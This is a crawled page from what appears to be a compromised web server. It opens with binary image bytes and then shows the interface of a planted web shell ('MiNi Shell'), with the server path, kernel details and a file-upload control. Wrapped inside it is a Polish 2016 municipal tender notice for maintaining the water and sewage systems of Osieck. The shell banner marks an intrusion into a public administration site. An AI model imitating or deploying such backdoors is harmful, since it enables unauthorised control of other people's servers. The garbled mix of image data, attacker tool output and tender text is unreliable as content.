JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20161125/352076-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='' target='_blank'></a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 352076 - 2016
              z dnia 2016-11-25 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Osieck: Konserwacja i eksploatacja obiektów i urządzeń stacji uzdatniania wody i sieci wodociągowej oraz oczyszczalni ścieków i sieci kanalizacyjnej, będących w użytkowaniu Gminy Osieck

<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Urząd Gminy, krajowy numer identyfikacyjny
              54171800000, ul.
              ul. Rynek 
              1,
              08445  
              Osieck, woj.
              mazowieckie, państwo
              Polska, tel.
              025 6857026 w. 14, e-mail
              , faks
              256 857 090.
              <br />
              Adres strony internetowej (URL): www.osieck.pl, www.bip.osieck.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Konserwacja i eksploatacja obiektów i urządzeń stacji uzdatniania wody i sieci wodociągowej oraz oczyszczalni ścieków i sieci kanalizacyjnej, będących w użytkowaniu Gminy Osieck

<br /><b>Numer referencyjny: </b>ZP. 271.23.2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>. Postanowienia ogólne.
Przedmiotem zamówienia jest:
a.	Bezpośrednia eksploatacja urządzeń wodociągowych (ujęcie wody składające się na dzień ogłoszenia postępowania przetargowego z 2 studni głębinowych, stacja uzdatniania wody w Osiecku, gminna sieć wodociągowa wraz z pompowniami w Czarnowcu i w Grabiance, przyłącza wodociągowe).
b.	Bezpośrednia eksploatacja urządzeń kanalizacji sanitarnej (Oczyszczalnia Ścieków Pogorzel, Oczyszczalnia ścieków w Augustówce, sieć kanalizacyjna w Osiecku, Pogorzeli, Grabiance i Augustówce, przepompownie ścieków, przyłącza kanalizacyjne).

Przedmiot zamówienia obejmuje:
1)Przyjęcie do eksploatacji środków trwałych, obejmujących cały istniejący system wodno-kanalizacyjny wraz z oczyszczalnią ścieków Pogorzel (w Osiecku), oczyszczalnią ścieków w Augustówce i stacją uzdatniania wody w Osiecku.
2)Przyjęcie do eksploatacji środków trwałych wybudowanych i oddanych do użytkowania w trakcie realizacji umowy wynikającej z niniejszego zamówienia.
3)Prowadzenie eksploatacji zgodnie z obowiązującymi szczegółowymi przepisami branżowymi, a zwłaszcza z przepisami dotyczącymi gospodarki wodno-ściekowej, w szczególności ustawy o zbiorowym zaopatrzeniu w wodę i zbiorowym odprowadzaniu ścieków, ustawy POŚ, ustawy Prawo Wodne, Rozporządzeń MŚ w sprawie: komunalnych osadów ściekowych, warunków jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego      
4)Oferent winien posiadać ubezpieczenie od odpowiedzialności cywilnej związanej z prowadzoną działalnością.
5)Ponoszenie pełnej odpowiedzialności za eksploatację całego systemu i przestrzeganie przepisów o ochronie środowiska, odpowiednich pozwoleń i koncesji, a także przepisów Kodeksu Pracy, BHP i innych.
6)Zwrot powierzonego mienia, w stanie niepogorszonym, na zakończenie umowy, chyba że zużycie nastąpiło na skutek normalnej eksploatacji. 

Szczegółowy opis przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 
kod CPV  41.11.00.00-3 Woda pitna
kod CPV  65.11.10.00-4 Przesył wody pitnej
kod CPV  65.12.00.00-0 Obsługa zakładów oczyszczania wody
kod CPV  65.13.00.00-3 Obsługa stacji wody
kod CPV  90.48.10.00-2 Eksploatacja zakładów oczyszczania ścieków
kod CPV  90.48.00.00-5 Usługi gospodarki ściekowej

Do obowiązków Wykonawcy należeć  będzie:

W ZAKRESIE EKSPLOATACJI I KONSERWACJI ZBIOROWYCH URZĄDZEŃ WODOCIĄGOWYCH:
1.	Bezpośrednia obsługa istniejącej sieci wodociągowej wraz z infrastrukturą i przyłączami. 
2.	Bezpośrednia obsługa ujęcia wody (studnie głębinowe, stacja uzdatniania wody, zbiorniki wody, zbiorniki wód popłucznych)   

STACJA UZDATNIANIA WODY W OSIECKU
Stan prawny: KW 42065 (dz. ew. nr 1410/4) i KW SI1G/00038970/4 (dz. ew. nr 1409/9)
Powierzchnia działki: 	0,44 ha
Wydajność max: 		80 m3/h (1 400 m3/dobę) 

Gmina Osieck posiada ponad 80 km wybudowanej sieci wodociągowej (magistralnej i rozdzielczej) oraz ok. 1 200 szt. przyłączy wodociągowych.     
Produkcja  wody (wyjście do sieci) od 1 stycznia 2016 r., do 30 października 2016 r. wyniosła wg wskazania wodomierza  131.300 m3, a sprzedaż wg wystawionych faktur 94.530 m3.
a)	całodobowa i bezawaryjna dostawa wody o parametrach dla wody pitnej określonych
w obowiązujących przepisach oraz likwidacja przyczyn i skutków odchyleń jakości wody od obowiązujących norm,
b)	utrzymanie w należytym stanie technicznym, sanitarnym i estetycznym studni głębinowych, stacji uzdatniania wody i przepompowni sieciowych, w szczególności bieżąca konserwacja urządzeń i rurociągów, tj. uzupełnianie uszkodzonej armatury i drobnego wyposażenia, czyszczenie urządzeń i rurociągów, bieżąca kontrola stanu technicznego studni głębinowych i stacji uzdatniania wody. 
c)	utrzymanie w należytym stanie technicznym, sanitarnym i estetycznym  urządzeń wodociągowych, w szczególności bieżąca konserwacja urządzeń i rurociągów, tj. uzupełnianie uszkodzonej armatury i drobnego wyposażenia, czyszczenie urządzeń i rurociągów, wymiana uszkodzonych wodomierzy, nawiertek, zasuw, hydrantów,
d)	eksploatacja studni głębinowych i stacji uzdatniania wody zapewniająca pozyskanie wody w odpowiedniej ilości, dla zapewnienia potrzeb odbiorców,
e)	W odniesieniu do SUW wymagana jest codzienna (7 razy w tygodniu) wizyta na terenie stacji, sprawdzenie poprawności działania wszystkich urządzeń, wykonanie niezbędnych czynności obsługowych, odnotowanie i zapisanie parametrów produkcji wody.
f)	Przynajmniej 1 raz w miesiącu, w terminach wynikających z harmonogramu przygotowanego przez Zamawiającego  uruchomienie agregatu prądotwórczego. Paliwo do agregatu zapewnia na bieżąco Wykonawca.    
g)	Wykonanie przeglądu agregatu prądotwórczego  w 2017 r.  
h)	Wykonanie badań instalacji elektrycznej w SUW Osieck jak również w pompowniach sieciowych w Grabiance i w Czarnowcu  w 2017r. 
i)	Założenie i prowadzenie, zgodnie z przepisami prawa i wymaganiami PPIS w Otwocku, Książki Eksploatacji obiektu i bieżące odnotowywanie wszelkich zdarzeń zarówno w obrębie obiektu jak również całej sieci wodociągowej. 
j)	niezwłoczne usuwanie wszelkich przecieków i nieszczelności na sieci wodociągowej, 
k)	niezwłoczne usuwanie wszelkich awarii i usterek technicznych powstałych na ujęciach wody zakłócających ciągłość dostaw wody i prawidłową eksploatację sieci,
(Podjęcie działań w kierunku usunięcia awarii w ciągu   do 2,5 godzin od chwili
zgłoszenia, usunięcie awarii w ciągu 12 godzin. Z chwilą, gdy przerwa w dostawie energii elektrycznej z sieci energetycznej przekracza 4 (cztery) godziny zasilanie energią elektryczną ujęcia wody, oczyszczalni ścieków z agregatów prądotwórczych.)
l)	likwidacja zastoin poprzez płukanie sieci wodociągowej wraz z przyłączami w razie konieczności, na podstawie zgłoszeń Zamawiającego jak również bezpośrednio Odbiorców wody, 
m)	każdorazowe powiadamianie Odbiorców na zasadach przewidzianych w Regulaminie o planowanych przerwach lub ograniczeniach w dostawie wody,
n)	w przypadku przedłużającej się przerwy w dostawie wody, Wykonawca zobowiązany jest zapewnić jej dostawę w inny sposób (np. beczkowozy),
o)	kontrola legalności poboru wody, informowanie Zamawiającego o stwierdzonych nieprawidłowościach i usuwanie nielegalnych poborów wody,
p)	kontrola legalności oraz instalowanie nowych lub wymiana legalizacyjna wodomierzy wraz z ich zaplombowaniem (wodomierze wraz z uszczelkami i plomby    Zamawiającego).
Wykonawca musi przewidzieć w ofercie koszt planowanej akcji wymiany po 350 szt.  wodomierzy u Odbiorców, w 2017r., niezależnie od bieżących potrzeb wymiany wodomierzy.
q)	Prowadzenie ewidencji wszystkich hydrantów przeciwpożarowych na terenie Gminy Osieck oraz ich cyklicznych, systematycznych przeglądów. Zorganizowane przeglądy hydrantów w każdej miejscowości będą się odbywały przynajmniej jeden raz w roku i będą polegały na sprawdzeniu działania zamknięcia i otwarcia samego hydrantu i zasuwy odcinającej hydrant oraz przepłukaniu sieci, do uzyskania widocznej czystości wypływającej wody. Każdorazowe zaplombowanie hydrantu po jego  użyciu; drut i plomby zapewnia Wykonawca na własny koszt.   
Wykonawca musi przewidzieć w ofercie koszt planowanej akcji naprawy i/lub wymiany do 20 szt. hydrantów uszkodzonych, wskazanych przez Zamawiającego,  w uzgodnionym z nim terminie.        
r)	usuwanie awarii wodociągu w zakresie eksploatacji na sieci wodociągowej 
i przyłączach wodociągowych, do pierwszego zaworu za wodomierzem głównym,
s)	bezpośrednie przyjmowanie zgłoszeń od Odbiorców i reagowanie na każde zgłoszenie, w zakresie odpowiedzialności Gminy (sieć + przyłącza wraz z zaworem za wodomierzem głównym), 
t)	lokalizacja i odkrywanie zakrytych zasuw odcinających na sieci oraz na przyłączach i  w razie konieczności uzupełnianie brakujących elementów  trzpieni do zasuw, skrzynek, tabliczek informacyjnych, słupków oznaczeniowych, pokryw betonowych.
u)	W zakresie estetyki wymienionych obiektów (SUW, pompownie sieciowe w Grabiance i Czarnowcu) należy uwzględnić m.in. wykaszanie trawy na terenie SUW i przepompowni na trasie wodociągu, co najmniej 4 razy w roku, t.j. pierwsze do 15 maja, drugie do 30 czerwca, trzecie do 15 sierpnia i czwarte do 30 września, naprawę i konserwację ogrodzenia zewnętrznego, w tym bram i furtek, utrzymanie w czystości i porządku terenu, powierzchni utwardzonych i nieutwardzonych, skarp nasypów. 
v)	Zamawiający zwraca szczególną uwagę, na konieczność oczyszczenia i stałego utrzymywania w czystości  całej powierzchni drogi wewnętrznej wysypanej białym żwirem (od bramy wjazdowej przy ul. Lubelskiej, na wprost do budynku stacji i do obu studni głębinowych  na terenie SUW Osieck.

Wykonawca musi uwzględnić w ofercie fakt, że w trakcie realizacji Umowy zmieni się ilość eksploatowanych studni głębinowych na terenie ujęcia wody SUW Osieck. Aktualnie Gmina Osieck eksploatuje 2 studnie głębinowe wykonane na przełomie lat 1978-1979.
Z uwagi na ich wiek oraz udokumentowany - zły stan techniczny, konieczna jest budowa nowego/-ych otworów. Gmina Osieck posiada zatwierdzony Projekt robót geologicznych na wykonanie otworu studziennego S3. W listopadzie b.r. zostało udzielone zlecenie na wykonanie tego otworu, a w dalszym czasie (w roku 2017) studnia S3 zostanie włączona do eksploatacji. W dalszej perspektywie, ale prawdopodobnie w trakcie realizacji niniejszego zamówienia, Zamawiający podejmie działania zmierzające do budowy kolejnego  czwartego otworu studziennego S4. Jednocześnie w zależności od warunków i potrzeb, z eksploatacji mogą być w tym okresie wyłączone i zlikwidowane obie dotychczasowe studnie - S1 i S2.  
Wykonawca zobowiązany jest uwzględnić planowane działania Zamawiającego w tym zakresie oraz ich konsekwencje, w kalkulacji swojej oferty.          


W ZAKRESIE SIECI KANALIZACYJNEJ I OCZYSZCZALNI ŚCIEKÓW:

OCZYSZCZALNIA ŚCIEKÓW
Stan prawny: 		KW SI1G/00038969/4 (dz. ew. nr 1623), KW SI1G00059179/2 
(dz. ew. nr 1625/1)    
Powierzchnia działki:	 	 ok. 0,4 ha
Przepustowość:
	średniodobowa		150 m3/d
	maksymalna dobowa		200 m3/d
Odbiornikiem ścieków oczyszczonych jest tzw. Kanał Osiecki

a)	bezpośrednia obsługa istniejącej sieci kanalizacji sanitarnej w Gminie Osieck wraz z urządzeniami: długość sieci na dzień ogłoszenia postępowania:
  kanalizacja sanitarna w Osiecku: grawitacyjna (DN200 i DN250 PVC) 10,15 km, tłoczna (DN90 PE) 0,68 km, 2 szt. przepompowni ścieków, ok. 300 szt. przyłączy kanalizacyjnych,
  - kanalizacja sanitarna grawitacyjna w Pogorzeli: grawitacyjna (DN200 PVC) 2.100,50 m, tłoczna (DN110 PE) - 2.220,00 m , 1 szt. przepompowni ścieków,  ok. 100 szt. przyłączy kanalizacyjnych,
 -  kanalizacja sanitarna grawitacyjna w Grabiance: grawitacyjna (DN200 PVC)  1807,50 m, tłoczna (DN140 PE) - 2.188,00 m , 1 szt. przepompowni ścieków, ok. 30 szt. przyłączy kanalizacyjnych,
 - kanalizacja sanitarna grawitacyjna w Augustówce - odcinek od pompowni P3 do Szkoły Podstawowej, wzdłuż ul. Osieckiej (DN200 PVC)  906 m, tłoczna (DN125 PE)  2.977 m, ok. 35 szt. przyłączy kanalizacyjnych,  1 szt. przepompowni ścieków,
b)	bezpośrednia obsługa zbudowanej w 2009 r. mechaniczno-biologicznej oczyszczalni ścieków Pogorzel, zlokalizowanej w miejscowości Osieck., według opracowanej przez firmę BIO-TECH Sp. z o.o. i załączonej Instrukcji Eksploatacji Oczyszczalni ścieków BIO-PAK typ KBA-100-1000, w tym m.in. codzienna obsługa pompowni ścieków surowych (usuwanie skratek z kraty koszowej, czyszczenie pomp, czyszczenie ścian i dna zbiornika), czyszczenie sita bębnowego, opróżnianie rury centralnej w reaktorze, bieżące, codzienne odwadnianie osadu nadmiernego w prasie (6 dni w tygodniu, bez niedzieli), magazynowanie osadu w kontenerach i jego systematyczny wywóz, sprzątanie i utrzymywanie w stałej czystości budynku oczyszczalni  ściany, posadzki, urządzenia,  obiektów i całego terenu w granicach ogrodzenia oraz wylotu ścieków do Kanału Osieckiego, likwidacja przyczyn i skutków odchyleń od norm jakości odprowadzanych ścieków.   
W odniesieniu do OŚ Pogorzel wymagana jest codzienna (7 dni w tygodniu) wizyta na terenie oczyszczalni, sprawdzenie poprawności działania wszystkich urządzeń, wykonanie niezbędnych czynności obsługowych, odnotowanie i zapisanie parametrów oczyszczania ścieków.
c)	bieżąca eksploatacja oczyszczalni ścieków w Augustówce, zapewniająca uzyskanie parametrów ścieków oczyszczonych zgodnych z pozwoleniem wodno-prawnym: 
BZT5  25 mgO2/l, ChZT  125 mgO2/l , zawiesina ogólna   35 mg/l, oraz likwidacja przyczyn i skutków odchyleń od norm odprowadzanych ścieków. 
W odniesieniu do tego obiektu wymagana jest okresowa wizyta (1 raz w miesiącu) w oczyszczalni i sprawdzenie poprawności działania urządzeń. Wykonawca musi przewidzieć przeprowadzenie w terminie uzgodnionym z Zamawiającym  jednorazowej akcję czyszczenia oczyszczalni (pompowni i reaktora) polegającej na opróżnieniu obu zbiorników ze ścieków, wyczyszczeniu urządzeniem ciśnieniowym myjącym wszystkich urządzeń i powierzchni, przewodów, wykonanie w razie potrzeby niezbędnych napraw  instalacji, ponowne napełnienie zbiornika i uruchomienie oczyszczalni.  
d)	Bieżąca eksploatacja przyobiektowej oczyszczalni ścieków przy budynku przedszkola w Sobienkach, od września 2017r.        
e)	właściwe i zgodne z prawem zagospodarowanie odwodnionego na prasie osadu oraz odpadów powstających na oczyszczalniach. Wykonawca jest zobowiązany do bieżącego przekazywania (z każdego dokonanego wywozu) Karty przekazania odpadu dla powstających w oczyszczalni osadów i odpadów ściekowych.
Karty przekazania odpadu będą wymaganym przez Zamawiającego załącznikiem do wystawianych przez Wykonawcę comiesięcznych faktur za realizację usługi. 




Zamawiający zwraca szczególną uwagę, oczekuje od Wykonawcy i będzie egzekwował, zgodną z Instrukcją Eksploatacji Oczyszczalni obsługę obiektu.

Np. w zakresie gospodarki osadowej - codzienną kontrolę stężenia osadu czynnego w komorze osadu czynnego, codzienną kontrolę stężenia tlenu w reaktorze i podejmowanie odpowiednich do wyników kontroli działań. 

f)	całodobowy i bezawaryjny odbiór ścieków od odbiorców indywidualnych i zbiorowych.
g)	bieżąca konserwacja i naprawa urządzeń kanalizacyjnych i wszystkich elementów urządzeń oczyszczalni ścieków, usuwanie awarii i usterek oraz dbałość o stan techniczny wszystkich elementów oczyszczalni ścieków, sieci kanalizacyjnej, studzienek kanalizacyjnych, oraz przepompowni ścieków.
Wykonawca musi przewidzieć i skalkulować w cenie oferty koszt niezbędnych napraw urządzeń i instalacji   m.in. pomp ściekowych w pompowni, pomp osadu i flokulantu oraz sprężarki  w instalacji odwadniania osadu 
(Podjęcie działań w kierunku usunięcia awarii w ciągu  do 2,5 godzin od chwili zgłoszenia, usunięcie awarii w cg 12 godzin. W przypadku, gdyby czas trwania awarii sieci kanalizacji sanitarnej powodował brak możliwości odbioru ścieków, Wykonawca zapewni ich odbiór wozami asenizacyjnymi.)
h)	czyszczenie sieci kanalizacji sanitarnej wraz z przyłączami w razie konieczności.
i)	systematyczne czyszczenie wszystkich przepompowni ścieków z osadów  co najmniej 1 raz na kwartał (lub w razie potrzeby) wg harmonogramu przedstawionego przez Zamawiającego. 
j)	Bieżący - codzienny, monitoring pracy wszystkich  pompowni ścieków na udostępnionej przez Zamawiającego (wraz z loginem i hasłem) stronie internetowej, obejmujący sprawdzenie prawidłowości i cykliczności pracy pomp, odnotowanych stanów alarmowych, poziomu ścieków itp.  Bieżąca kontrola stanu pompowni i jej pracy ma być dla Wykonawcy sygnałem do podjęcia działań np. w celu wyjęcia i oczyszczenia pomp, wyczyszczenia zbiornika pompowni z nagromadzonych osadów stałych.   
k)	kontrola legalności zrzutu ścieków i podłączeń do kanalizacji sanitarnej. 
Wykonawca musi uwzględnić w ofercie 2-krotne przeprowadzenie, w porozumieniu i w terminie ustalonym z  Zamawiającym,  akcji zadymiania układu kanalizacyjnego,  obejmującej całość sieci w miejscowościach Osieck, Pogorzel i Grabianka i Augustówka.      
l)	bezzwłoczne usuwanie awarii na obiektach przepompowni ścieków, urządzeń kanalizacji  sanitarnej i oczyszczalni ścieków. Zamawiający ma tu na myśli konieczność niezwłocznego podjęcia działań przez Wykonawcę w celu doprowadzenia obiektów i urządzeń do stanu normalnej sprawności technicznej.     
m)	utrzymanie w należytym stanie technicznym, sanitarnym i estetycznym oczyszczalni ścieków i urządzeń kanalizacyjnych, a w szczególności bieżąca konserwacja urządzeń i rurociągów, tj. uzupełnianie wadliwej lub uszkodzonej armatury i wyposażenia, czyszczenie urządzeń i rurociągów, wymiana uszkodzonych studni kanalizacyjnych, włazów ulicznych, bieżąca kontrola stanu technicznego, wykonanie przeglądu okresowego dmuchaw  w roku 2017 i 2018, wraz z wymianą materiałów eksploatacyjnych jak np. olej, filtry, paski.  
n)	W zakresie estetyki obiektów (OŚ Augustówka, OŚ Pogorzel, pompownie ścieków)  należy uwzględnić m.in. wykaszanie trawy co najmniej 4 razy w roku, t.j. pierwsze do 15 maja, drugie do 30 czerwca, trzecie do 15 sierpnia i czwarte do 30 września, naprawę i konserwację ogrodzenia zewnętrznego, w tym bram i furtek, utrzymanie w czystości i porządku terenu, powierzchni utwardzonych i nieutwardzonych, skarp nasypów.
